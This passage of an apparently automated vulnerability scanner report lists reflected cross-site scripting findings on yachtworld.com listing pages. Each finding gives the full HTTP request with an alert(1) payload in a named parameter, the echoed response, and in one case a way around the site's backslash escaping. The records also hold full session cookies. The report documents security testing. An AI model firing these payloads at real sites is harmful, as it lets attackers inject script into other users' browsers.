savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:03:47 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/atlanticmarine/boat
...[SNIP]...
<a href="/privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757&currency=USD&units=Feet&currencyid=10037b44"><script>alert(1)</script>01b74b349bb&checked=2267335&checked=2294519&checked=2298347&checked=2250263&checked=2237936&checked=2210955&checked=2154048&checked=2288204&checked=2280924&checked=2230830&checked=2215702&checked=2215721&checked=
...[SNIP]...

3.513. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/cache/pl_search_results.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3100b"><script>alert(1)</script>2bb13b8b4d3 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privatelabel/listing/cache/pl_search_results.jsp?slim=pp2797573100b"><script>alert(1)</script>2bb13b8b4d3&cit=true&sm=3&is=&man=&fromLength=&toLength=&luom=126&fromYear=&toYear=&fromPrice=&toPrice=&currencyid=100&hmid=&ftid=&enid=&city=&spid=&rid=&cint=&msint=&ps=50 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticmarinesales.com/index.php/inventory/new-inventory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Thu, 27 Jan 2011 19:38:14 GMT
Server: Apache
Cache-Control: private
Set-Cookie: yw_c_id=1309785053367209910; path=/; expires=Tue, 14-Feb-2079 22:52:21 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Content-Type: text/html; charset=utf-8
Content-Length: 63275

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transiti
...[SNIP]...
<a href="/privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp2797573100b"><script>alert(1)</script>2bb13b8b4d3&currency=USD&units=Feet&currencyid=100&checked=2235887&checked=2305259&checked=2275334&checked=2272084&checked=1451158&checked=2305727&checked=2098392&checked=1657843&checked=1686737&checked=2204164&c
...[SNIP]...

3.514. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [sm parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/cache/pl_search_results.jsp

Issue detail

The value of the sm request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c911'%3balert(1)//e8a575a9037 was submitted in the sm parameter. This input was echoed as 2c911';alert(1)//e8a575a9037 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /privatelabel/listing/cache/pl_search_results.jsp?slim=pp279757&cit=true&sm=32c911'%3balert(1)//e8a575a9037&is=&man=&fromLength=&toLength=&luom=126&fromYear=&toYear=&fromPrice=&toPrice=&currencyid=100&hmid=&ftid=&enid=&city=&spid=&rid=&cint=&msint=&ps=50 HTTP/1.1
Host: www.yachtworld.com
Proxy-Connection: keep-alive
Referer: http://www.atlanticmarinesales.com/index.php/inventory/new-inventory/
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 500 Internal Server Error
Date: Thu, 27 Jan 2011 19:38:34 GMT
Server: Apache
Cache-Control: private
Set-Cookie: yw_c_id=7555166865925079182; path=/; expires=Tue, 14-Feb-2079 22:52:40 GMT
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19907

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en-US">
<head>

...[SNIP]...
<br>'+ 'ExceptionMessage: For input string: "32c911';alert(1)//e8a575a9037"<br>
...[SNIP]...

3.515. http://www.yachtworld.com/privatelabel/listing/cache/pl_search_results.jsp [so parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/cache/pl_search_results.jsp

Issue detail

The value of the so request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 65c0f"><script>alert(1)</script>98054a37654 was submitted in the so parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /privatelabel/listing/cache/pl_search_results.jsp?ps=50&slim=pp279757&uom=126&sm=3&duom=126&wuom=126&currencyid=100&luom=126&ps=50&searchPage=%2Flisting%2Fcache%2Fboats_for_sale_qs.jsp&so=265c0f"><script>alert(1)</script>98054a37654&slim=pp279757&currency=USD&units=Feet&currencyid=100& HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:05:08 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">

<!-- /opt/weblogic/waeyw/ywcluster/public_html/broker_pages/atlanticmarine/boat
...[SNIP]...
<input type="hidden" name="so" value="265c0f"><script>alert(1)</script>98054a37654" />
...[SNIP]...

3.516. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c4090\'%3balert(1)//884e898defa was submitted in the slim parameter. This input was echoed as c4090\\';alert(1)//884e898defa in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to prevent termination of the quoted JavaScript string by placing a backslash character (\) before any quotation mark characters contained within the input. The purpose of this defense is to escape the quotation mark and prevent it from terminating the string. However, the application fails to escape any backslash characters that already appear within the input itself. This enables an attacker to supply their own backslash character before the quotation mark, which has the effect of escaping the backslash character added by the application, and so the quotation mark remains unescaped and succeeds in terminating the string. This technique is used in the attack demonstrated.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. If it is unavoidable to echo user input into a quoted JavaScript string the the backslash character should be blocked, or escaped by replacing it with two backslashes.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757c4090\'%3balert(1)//884e898defa&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:01:26 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<link rel="stylesheet" type="te
...[SNIP]...
<a href=\'/privatelabel/listing/pl_display_photo.jsp?slim=pp279757c4090\\';alert(1)//884e898defa&boat_id=2267335&boatname=29%27+Grady+White+290+Chesapeake&photo_revised_date=1285442537000&photo_name=Photo+1&photo=30&url=\'>
...[SNIP]...

3.517. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 85379"style%3d"x%3aexpression(alert(1))"7ba51db43dd was submitted in the slim parameter. This input was echoed as 85379"style="x:expression(alert(1))"7ba51db43dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp27975785379"style%3d"x%3aexpression(alert(1))"7ba51db43dd&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=1.1296155952.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_evar22%3D2%253A15PM%3B%20s_evar23%3DThursday%3B%20s_evar24%3DWeekday%3B%20ev4%3Dno%2520search%2520phrase%2520entered%3B%20ev5%3Dregulator%3B%20ev6%3Dused%3B%20ev7%3Dno%2520search%2520phrase%2520entered%3B%20ev8%3D24%2527-32%2527%3B%20ev9%3D%253E2004%3B%20ev10%3Dno%2520search%2520phrase%2520entered%3B%20ev11%3Dno%2520search%2520phrase%2520entered%3B%20ev12%3Dno%2520search%2520phrase%2520entered%3B%20ev13%3Dno%2520search%2520phrase%2520entered%3B%20ev14%3Dno%2520search%2520phrase%2520entered%3B%20ev15%3Dno%2520search%2520phrase%2520entered%3B%20ev16%3Dno%2520search%2520phrase%2520entered%3B%20ev17%3Dunited%2520states%3B%20ev18%3Dno%2520search%2520phrase%2520entered%3B%20s_sq%3D%3B; savedLabel0=24-32%20ft,regulator,Used,2004; yw_c_id=5778232892790151794; savedLabel1=24-32%20ft%2Cregulator%2C%09Used%2C2004%2C0%20US%20Dollars%2CUnited%20States; latestSavedSearches=1_0_; savedSearch1=cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26searchtype%3Dadvancedsearch%26Ntk%3DboatsEN%26Ntt%3D%26is%3Dfalse%26man%3Dregulator%26hmid%3D0%26ftid%3D0%26enid%3D0%26fromLength%3D24%26toLength%3D32%26luom%3D126%26fromYear%3D2004%26toYear%3D%26fromPrice%3D0%26toPrice%3D%26currencyid%3D100%26city%3D%26rid%3D%26cint%3D100%26pbsint%3D%26boatsAddedSelected%3D-1; VIEWED_BOATS_STORE=2262662%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B119%2C000%5B%25%5DSomers+Point%2C+NJ%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F2%2F6%2F2262662_1_mini.jpg%3F1284487523000%5B%25%5D%2Fboats%2F2006%2FRegulator-32-Forward-Seating-2262662%2FSomers-Point%2FNJ%2FUnited-States%7B*%7D2237772%5B%25%5D32%27+Regulator+32+Forward+Seating%5B%25%5DUSD%26nbsp%3B112%2C995%5B%25%5DParkton%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F3%2F7%2F7%2F2237772_17_mini.jpg%3F1280883217000%5B%25%5D%2Fboats%2F2005%2FRegulator-32-Forward-Seating-2237772%2FParkton%2FMD%2FUnited-States%7B*%7D2194614%5B%25%5D32%27+Regulator+32+CC+4+STROKE+250+YAMAHAS%5B%25%5DUSD%26nbsp%3B119%2C900%5B%25%5DOcean+City%2C+MD%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F1%2F9%2F4%2F6%2F2194614_18_mini.jpg%3F1280883629000%5B%25%5D%2Fboats%2F2007%2FRegulator-32-CC-4-STROKE-250-YAMAHAS-2194614%2FOcean-City%2FMD%2FUnited-States%7B*%7D2266476%5B%25%5D32%27+32+Regulator+WITH+TRAILER+**REDUCED**%5B%25%5DUSD%26nbsp%3B108%2C000%5B%25%5DDestin%2C+FL%5B%25%5Dhttp%3A%2F%2Fnewimages.yachtworld.com%2F%2F2%2F2%2F6%2F6%2F4%2F2266476_1_mini.jpg%3F1285261228000%5B%25%5D%2Fboats%2F2006%2F32-Regulator-WITH-TRAILER-**REDUCED**-2266476%2FDestin%2FFL%2FUnited-States; savedSearch0=man%3Dregulator%26is%3Dfalse%26type%3D%26luom%3D126%26fromLength%3D24%26toLength%3D32%26fromYear%3D2004%26toYear%3D%26pricderange%3DSelect%2520Price%2520Range%26Ntt%3D%26fromPrice%3D0%26toPrice%3D%26searchtype%3Dhomepage%26cit%3Dtrue%26slim%3Dquick%26ybw%3D%26sm%3D3%26Ntk%3DboatsEN%26currencyid%3D100; s_pers=%20s_nr%3D1296156328837%7C1298748328837%3B%20s_lv%3D1296156328839%7C1390764328839%3B%20s_lv_s%3DFirst%2520Visit%7C1296158128839%3B; s_vi=[CS]v1|26A0E25385162B05-600001A6003F61D3[CE]; yw_locale2=en_US; __utma=1.2048642607.1296155952.1296155952.1296155952.1; __utmc=1; __utmb=1.26.10.1296155952;

Response (redirected)

HTTP/1.0 200 OK
Date: Thu, 27 Jan 2011 20:01:20 GMT
Server: Apache
Cache-Control: private
Vary: Accept-Encoding,User-Agent
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa TAIa PSDa CONi OUR BUS IND ONL UNI PUR FIN COM NAV INT STA PRE LOC"
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<link rel="stylesheet" type="te
...[SNIP]...
<A href="/privatelabel/listing/pl_display_photo.jsp?slim=pp27975785379"style="x:expression(alert(1))"7ba51db43dd&ybw=&boat_id=2267335&boatname=29%27+Grady+White+290+Chesapeake&photo_revised_date=1285442537000&photo_name=Photo+2&photo=1">
...[SNIP]...

3.518. http://www.yachtworld.com/privatelabel/listing/pl_boat_detail_handler.jsp [slim parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://www.yachtworld.com
Path:	/privatelabel/listing/pl_boat_detail_handler.jsp

Issue detail

The value of the slim request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e075d'><script>alert(1)</script>458e4d47109 was submitted in the slim parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /privatelabel/listing/pl_boat_detail_handler.jsp?slim=pp279757e075d'><script>alert(1)</script>458e4d47109&currency=USD&units=Feet&currencyid=100&boat_id=2267335&primary_photo_id=30&back=%2Fprivatelabel%2Flisting%2Fcache%2Fpl_search_results.jsp%3Fsm%3D3%26luom%3D126%26currencyid%3D100%26cit%3Dtrue%26ps%3D50%26slim%3Dpp279757&searchtype=buy HTTP/1.1
Host: www.yachtworld.com
Accept: */*
Accept-Language: en
